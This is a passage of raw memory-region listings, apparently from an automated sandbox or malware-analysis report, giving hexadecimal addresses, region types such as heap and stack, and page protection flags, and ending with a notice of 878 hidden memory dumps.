heap
page read and write
32DA000
heap
page read and write
29BB000
stack
page read and write
D99000
heap
page read and write
478000
unkown
page readonly
2E04000
unkown
page read and write
4CDC000
heap
page read and write
2430000
direct allocation
page read and write
31E6000
unkown
page read and write
F83000
heap
page read and write
9B000
stack
page read and write
6AC62FE000
unkown
page readonly
33F6000
heap
page read and write
2E04000
unkown
page read and write
2C3B000
stack
page read and write
6AC5D7E000
stack
page read and write
4839000
heap
page read and write
2D34000
unkown
page read and write
174C584C000
heap
page read and write
59F0000
heap
page read and write
3221000
heap
page read and write
70131000
unkown
page read and write
2DE0000
unkown
page readonly
522000
unkown
page write copy
3100000
heap
page read and write
3D0000
heap
page read and write
2D10000
unkown
page readonly
31E6000
unkown
page read and write
2B44000
unkown
page read and write
2AA0000
heap
page read and write
39E0000
trusted library allocation
page read and write
2AAB000
heap
page read and write
2D34000
unkown
page read and write
174C5819000
heap
page read and write
3672000
heap
page read and write
2D7E000
unkown
page read and write
3305000
heap
page read and write
2B44000
unkown
page read and write
4A19000
trusted library allocation
page read and write
174C5820000
heap
page read and write
174C0900000
heap
page read and write
F5B000
heap
page read and write
5179000
direct allocation
page read and write
174C583F000
heap
page read and write
FBA000
heap
page read and write
2D34000
unkown
page read and write
2B44000
unkown
page read and write
6AC68FE000
unkown
page readonly
41A3000
unkown
page read and write
2B44000
unkown
page read and write
322E000
unkown
page read and write
174C008B000
heap
page read and write
6AC55FE000
unkown
page readonly
F28000
heap
page read and write
31E8000
heap
page read and write
6C910000
unkown
page readonly
4CB9000
direct allocation
page read and write
2D34000
unkown
page read and write
30DE000
unkown
page read and write
174C5854000
heap
page read and write
174C00AE000
heap
page read and write
A85000
heap
page read and write
5050000
direct allocation
page read and write
2950000
heap
page read and write
4042000
unkown
page read and write
E44000
heap
page read and write
31E6000
unkown
page read and write
359E000
unkown
page read and write
3280000
direct allocation
page read and write
6AC61FE000
stack
page read and write
2E04000
unkown
page read and write
47D000
stack
page read and write
174C5571000
trusted library allocation
page read and write
2B44000
unkown
page read and write
3FA0000
unkown
page read and write
DA4000
heap
page read and write
401000
unkown
page execute read
174C0F50000
trusted library section
page readonly
940000
heap
page read and write
3210000
heap
page read and write
4002000
unkown
page read and write
2AA9000
heap
page read and write
D50000
heap
page read and write
401000
unkown
page execute read
CB4000
heap
page read and write
5EBE000
stack
page read and write
3F30000
unkown
page read and write
100E000
stack
page read and write
31E7000
unkown
page read and write
2E04000
unkown
page read and write
5711000
unkown
page read and write
2A00000
heap
page read and write
DF3000
heap
page read and write
2B44000
unkown
page read and write
57F000
unkown
page write copy
400000
unkown
page readonly
2DEF000
unkown
page read and write
6AC697E000
stack
page read and write
4BBF000
heap
page read and write
2E04000
unkown
page read and write
8C9000
unkown
page read and write
CB4000
heap
page read and write
296D000
heap
page read and write
31F1000
heap
page read and write
2E04000
unkown
page read and write
DEE000
heap
page read and write
31EF000
unkown
page read and write
174C0089000
heap
page read and write
33B0000
heap
page read and write
2DD0000
unkown
page read and write
2E04000
unkown
page read and write
2D34000
unkown
page read and write
31F0000
heap
page read and write
2B44000
unkown
page read and write
31E7000
unkown
page read and write
2A1D000
heap
page read and write
3B7E000
trusted library allocation
page read and write
31E6000
unkown
page read and write
CB4000
heap
page read and write
D90000
heap
page read and write
2FC0000
heap
page read and write
174C5570000
trusted library allocation
page read and write
5400000
unkown
page read and write
47DA000
heap
page read and write
3104000
unkown
page read and write
471000
unkown
page write copy
2E04000
unkown
page read and write
2A0B000
heap
page read and write
2551000
heap
page read and write
58E000
unkown
page write copy
49E000
stack
page read and write
2FF4000
unkown
page read and write
31D6000
unkown
page read and write
CBE000
stack
page read and write
4131000
unkown
page read and write
4019000
unkown
page read and write
6AC54FE000
stack
page read and write
174C55B0000
trusted library allocation
page read and write
D86000
heap
page read and write
C70000
heap
page read and write
31E6000
unkown
page read and write
8A2000
unkown
page write copy
2D34000
unkown
page read and write
2A07000
heap
page read and write
FBD000
heap
page read and write
There are 878 hidden memdumps, click here to show them.